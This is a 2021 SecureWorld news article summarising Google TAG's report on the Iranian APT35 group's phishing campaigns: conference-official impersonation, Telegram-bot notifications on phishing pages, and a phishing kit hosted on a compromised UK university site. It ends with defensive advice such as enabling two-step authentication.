author photo
By SecureWorld News Team
Tue | Oct 19, 2021 | 3:31 AM PDT

When it comes to nation-state hackers, Russian and Chinese operations are always in the limelight.

Microsoft, for instance, just released its 2021 Digital Defense Report pointing a finger at Russia as making up 58% of all nation-state cyberattack incidents observed by the company. With numbers like that and a focus on ransomware, it is easy to see why Russia is owning most of the headlines.

But just because Russia is one of the largest threats does not mean it is wise to discount other global malicious organizations. One notorious hacking group from Iran uses particularly dirty schemes to fleece users, according to Google's Threat Analysis Group (TAG). 

TAG reported that Iranian-government-backed actors, known as APT35 and by the aliases Rocket Kitten and Charming Kitten, are quickly picking up speed, especially when it comes to implementing slick phishing attacks.

Developing advanced phishing techniques to lure victims 

APT35 are nation-state hackers working for the Iranian government, and they have a long list of attack techniques that play out like the best hits in phishing. 

The malicious campaigns Charming Kitten are unleashing on unsuspecting victims makes use of superior social engineering, such as creating dummy accounts on Gmail that look realistic enough to trick users into clicking through. 

According to Google's TAG blog, APT35 have been active since at least 2017, including attacks on the 2020 U.S. elections. 

"This [APT35] is the one of the groups we disrupted during the 2020 US election cycle for its targeting of campaign staffers. For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government."

APT35 thrives by going after high-risk and high-profile users simultaneously, mostly through creating realistic documents for phishing attacks. One method this group likes to use is to create email messages to target conference goers.  

"One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks. Attackers used the Munich Security and the Think-20 (T20) Italy conferences as lures in non-malicious first contact email messages to get users to respond. When they did, attackers sent them phishing links in follow-on correspondence."

Through using a Google Form, the group emails conference goers with a compromised form, directing the user to click on a phishing link. 

In addition to the cybercrimes APT35 have already committed, this group's telltale approach comes through using Telegram Messenger, an online messaging app.

"One of APT35's novel techniques involves using Telegram for operator notifications. The attackers embed javascript into phishing pages that notify them when the page has been loaded.

To send the notification, they use the Telegram API send Message function, which lets anyone use a Telegram bot to send a message to a public channel. The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time."

Google has since reported the bot and Telegram removed it, but it shows the edge this group is gaining by using AI technology to barrage users.  

Charming Kitten successfully attacks university website

This nation-state hacking organization was also recently connected to a U.K. university cyberattack, where they fooled the university into hosting a phishing kit on their website. 

Officials at the School of Oriental and African Studies (SOAS) at University of London did not even realize they had been breached at the time of the attack, which took place earlier this year in July

Other news outlets, as well as Google's blog, have cited the sophistication of the attacks were based on building a mock website, which appeared real to account holders. 

The group used ahead-of-the-curb methods by mixing in multi-factor authentication instructions to build in trust for more skeptical users.   

"APT35 compromised a website affiliated with a UK university to host a phishing kit. Attackers sent email messages with links to this website to harvest credentials for platforms such as Gmail, Hotmail, and Yahoo. Users were instructed to activate an invitation to a (fake) webinar by logging in. The phishing kit will also ask for second-factor authentication codes sent to devices," reads the TAG blog post.    

How can users stay safe from APT35's advanced threats?

Google TAG is already sending out warnings and alerting its user base to the threats of APT35. One of their recommendations is to enable two-step authentication. Google also promoted following their guidelines at Google Safe Browsing to safely navigate your time on the web. 

Not to mention, you may want to try out George Finney's "Slow Down and Frown" method while you are checking emails to reduce the chances of clicking on a phishing link. 

Read Google's official TAG blog to learn more about the technical details. 

[RESOURCE] If your organization is working to build the next great app, check out SecureWorld's Remote Sessions webcast, 7 Steps to Building Secure Applications. This presentation will help you understand the best security practices when developing an app.

Tags: APT, Iran, Phishing,
Comments